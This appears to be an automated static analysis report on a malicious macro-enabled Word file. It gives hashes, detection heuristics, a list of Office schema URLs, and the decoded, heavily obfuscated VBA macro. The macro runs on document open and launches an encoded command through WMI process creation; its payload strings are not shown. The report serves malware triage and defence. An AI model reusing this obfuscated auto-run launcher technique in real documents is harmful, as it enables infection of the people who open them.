Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 df2f847e0ceb1e22…

MALICIOUS

Office (OOXML)

127.9 KB Created: 2020-01-31 20:02:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-23
MD5: df45ca631cb98d355a4b0efcbd37bb8c SHA-1: ae9ccde1b44a1dfa15ac4fc6819f42b9d0ba7a47 SHA-256: df2f847e0ceb1e22def02c6e08603ca76a6c264b4bd09a2345040cd597e55d34
232 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-7572364-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-7572364-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Eonntaeoqm = GetObject(Qsbloagqxes)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8670 bytes
SHA-256: cd715d9390ee2519a89561c900dcfed4e634ad1a99bf75bcb28c7c5194254768
Detection
ClamAV: No threats found
Obfuscation or payload: likely
102 of 177 identifiers look randomly generated (e.g. 'Jyafpelcewptx') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Rmhpjcza"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   pl34 _
= "{TipTopPo}"
j3u = Oibkgqnfzwc + Gsravzah
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Iqsvexeheqe + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oxgacita)
ndko24 = "{TipTopPo}"
nsih6 = 125 + 142 + 588
akj3 = 970 + 926
kqkqn4 = (Zbbyadnkgt) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Unujiupxezqq
Zvgreixvf.Whwtmkbqxiz
End Sub


Attribute VB_Name = "Vzumvudwbpodi"
Attribute VB_Base = "0{316F8B58-5BC7-4EED-B2D8-7EB79C4541C6}{18236F7E-2130-4864-BBB6-F98C6A1B46E1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zvgreixvf"
Function Whwtmkbqxiz()
   pl34 _
= "{TipTopPo}"
j3u = Jxdjxpcnvsu + Qdasapohh
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Elrgfnxn + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Sfnnvupplw)
ndko24 = "{TipTopPo}"
nsih6 = 529 + 903 + 938
akj3 = 912 + 498
kqkqn4 = (Imycuypxib) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Emywiiuh
Vnhejylqm = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Vzumvudwbpodi.Daztbyqfh + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
   pl34 _
= "{TipTopPo}"
j3u = Bfcmhshp + Otxtrgmaq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cfrnogtlwlwz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Aifsymbkayjjj)
ndko24 = "{TipTopPo}"
nsih6 = 309 + 693 + 272
akj3 = 630 + 712
kqkqn4 = (Ygndhzak) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Lnekwsucvqyg
Qsbloagqxes = Nuvwrbnbvt(Vnhejylqm)
   pl34 _
= "{TipTopPo}"
j3u = Pqnyovdeoff + Jwxtentnw
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Renqygswyp + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Mweidhxtrhhea)
ndko24 = "{TipTopPo}"
nsih6 = 242 + 980 + 532
akj3 = 801 + 390
kqkqn4 = (Mlkdsjbhjimgh) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Vqrykwaep
Set Eonntaeoqm = GetObject(Qsbloagqxes)
   pl34 _
= "{TipTopPo}"
j3u = Ugcwrjouzg + Isltopnst
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ddhugatscyjmo + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wwdktbyopxpsp)
ndko24 = "{TipTopPo}"
nsih6 = 658 + 582 + 345
akj3 = 839 + 818
kqkqn4 = (Xrfjytkpi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Oziyfxqst
Qpiitproiikh = Vzumvudwbpodi.Lhyygyfp.Tag
   pl34 _
= "{TipTopPo}"
j3u = Gxfoqbglvto + Vavmwcca
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Vplymmjplys + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Cetvkacaakdo)
ndko24 = "{TipTopPo}"
nsih6 = 243 + 692 + 999
akj3 = 613 + 511
kqkqn4 = (Mnqxnnjjzfdty) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Cvkvgtid
Rqlponbfze = Qsbloagqxes + ChrW(Int(wdKeyS)) + Vzumvudwbpodi.Uniaeohk.Tag + Qpiitproiikh
   pl34 _
= "{TipTopPo}"
j3u = Qunksecvwepy + Djdyexkwaot
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzonixvgvbfkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oqbqhnhgvple)
ndko24 = "{TipTopPo}"
nsih6 = 107 + 987 + 376
akj3 = 331 + 724
kqkqn4 = (Tyrlhlwiqhak) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Iyochphkn
Tdqudfve = Rqlponbfze + Vzumvudwbpodi.Daztbyqfh
   pl34 _
= "{TipTopPo}"
j3u = Rbjquisuwlkak + Bjcujclefc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ikmcjmwz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ggmznmwm)
ndko24 = "{TipTopPo}"
nsih6 = 899 + 129 + 837
akj3 = 287 + 417
kqkqn4 = (Ceksrkbvgw) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gfjkkjanoqk
Set Jncttblcx = Yhhrqvocxju(Tdqudfve)
   pl34 _
= "{TipTopPo}"
j3u = Slpjohplqd + Vwkucgrr
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ljgivkughwzks + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ytcyzvbos)
ndko24 = "{TipTopPo}"
nsih6 = 764 + 807 + 153
akj3 = 379 + 789
kqkqn4 = (Bsnwhjqtagcgl) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kwedkezqdno
Call Eonntaeoqm. _
Create(NJ + Wxltifsded, Vjunmkck, Jncttblcx, Vcuippnnufu, Ukpdxpphjzh, Srinhkwaclwd)
   pl34 _
= "{TipTopPo}"
j3u = Ciuoiwlboa + Njkuorxxga
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ctzmqzzwxqfs + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qmhkspymfj)
ndko24 = "{TipTopPo}"
nsih6 = 445 + 609 + 816
akj3 = 294 + 783
kqkqn4 = (Mfnodcyampwzl) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Iowdrscb
End Function
Function Yhhrqvocxju(Docheoddz)
   pl34 _
= "{TipTopPo}"
j3u = Tyevpfcfqmq + Evxjlyqrtetgv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ovrdzpzg + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Uyocvsrryxe)
ndko24 = "{TipTopPo}"
nsih6 = 582 + 712 + 741
akj3 = 667 + 994
kqkqn4 = (Tcqyzulo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Bruvnzif
Set Yhhrqvocxju = GetObject(Docheoddz)
   pl34 _
= "{TipTopPo}"
j3u = Ymlsskyz + Tldqnwbqb
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Iizqnoiggwpht + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wsslyuesjxzli)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 93 + 182
akj3 = 615 + 631
kqkqn4 = (Jyafpelcewptx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ejjoajxp
Yhhrqvocxju. _
showwindow = Vaaljfvz + Hfuwimdnyxxve
   pl34 _
= "{TipTopPo}"
j3u = Avpsvvlavtdi + Nikjsukr
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Eykjobnkeqcc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ecnfmfwzzjtw)
ndko24 = "{TipTopPo}"
nsih6 = 193 + 271 + 922
akj3 = 175 + 951
kqkqn4 = (Gbiiiunxkcltf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jyksrfqgf
End Function
Function Nuvwrbnbvt(Qavebkkbbl)
   pl34 _
= "{TipTopPo}"
j3u = Arrubaqrfgl + Vvoxwpop
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ovgqtloejf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nzyxwsrut)
ndko24 = "{TipTopPo}"
nsih6 = 762 + 853 + 913
akj3 = 37 + 694
kqkqn4 = (Nytrullebfgd) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jwfqcbkdpioyy
Nuvwrbnbvt = Join$(Split(Qavebkkbbl, "/34//22/778//0//3/"), NoLineBreakAfter)
   pl34 _
= "{TipTopPo}"
j3u = Ukjxpjis + Jgwiiszcvsq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Yvynbkqtj + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Oeizqxjyo)
ndko24 = "{TipTopPo}"
nsih6 = 17 + 631 + 677
akj3 = 777 + 131
kqkqn4 = (Wclqihemhm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Lcqvhiqu
End Function
Function Wxltifsded()
   pl34 _
= "{TipTopPo}"
j3u = Kjmlefsqtqjuk + Aefjuvdqy
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hncsrkwubb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Xqpvcasdixzf)
ndko24 = "{TipTopPo}"
nsih6 = 319 + 740 + 190
akj3 = 20 + 16
kqkqn4 = (Wmchtnwuxf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Yyypghpn
Kgzgcaciszpf = ChrW(Int(wdKeyP))
   pl34 _
= "{TipTopPo}"
j3u = Dtwywcmjhmwgm + Ipnzmgasejwub
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gcokrblzii + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Esscwnwix)
ndko24 = "{TipTopPo}"
nsih6 = 869 + 998 + 846
akj3 = 1 + 488
kqkqn4 = (Epcarozhlh) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Tsbbvxqer
Uyqerugunyuoz = Kgzgcaciszpf + Vzumvudwbpodi.Advbcgiqes.ControlTipText + "     -e      "
   pl34 _
= "{TipTopPo}"
j3u = Bubpotnqks + Fbbyhaevm
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qwpmwpvsvw + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zamqplztr)
ndko24 = "{TipTopPo}"
nsih6 = 572 + 391 + 483
akj3 = 346 + 786
kqkqn4 = (Fzqzumvkwzik) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Grbozjigwbyuk
sser = Vzumvudwbpodi.Pcujazwsmzi.Pages(0).Caption
   pl34 _
= "{TipTopPo}"
j3u = Sxjbkvml + Ehtykqsmkbig
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Phclekhpyove + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Axcqyjwionii)
ndko24 = "{TipTopPo}"
nsih6 = 852 + 24 + 470
akj3 = 490 + 968
kqkqn4 = (Lkularlc) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Hsmpjfdg
Wxltifsded = Nuvwrbnbvt(Uyqerugunyuoz + StrReverse(sser))
   pl34 _
= "{TipTopPo}"
j3u = Qvdxpzsnzqn + Xhvyxvav
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Stomnsags + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zsfmqcshtp)
ndko24 = "{TipTopPo}"
nsih6 = 458 + 262 + 748
akj3 = 315 + 529
kqkqn4 = (Eszgpeixvdpke) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Fuyjujqyoq
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 55296 bytes
SHA-256: 8e94925f2296a998167df60b5eeef6e1cfacaa8fb236bf1c6d27bf5527534dd5
Detection
ClamAV: Doc.Malware.Sagent-7572364-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).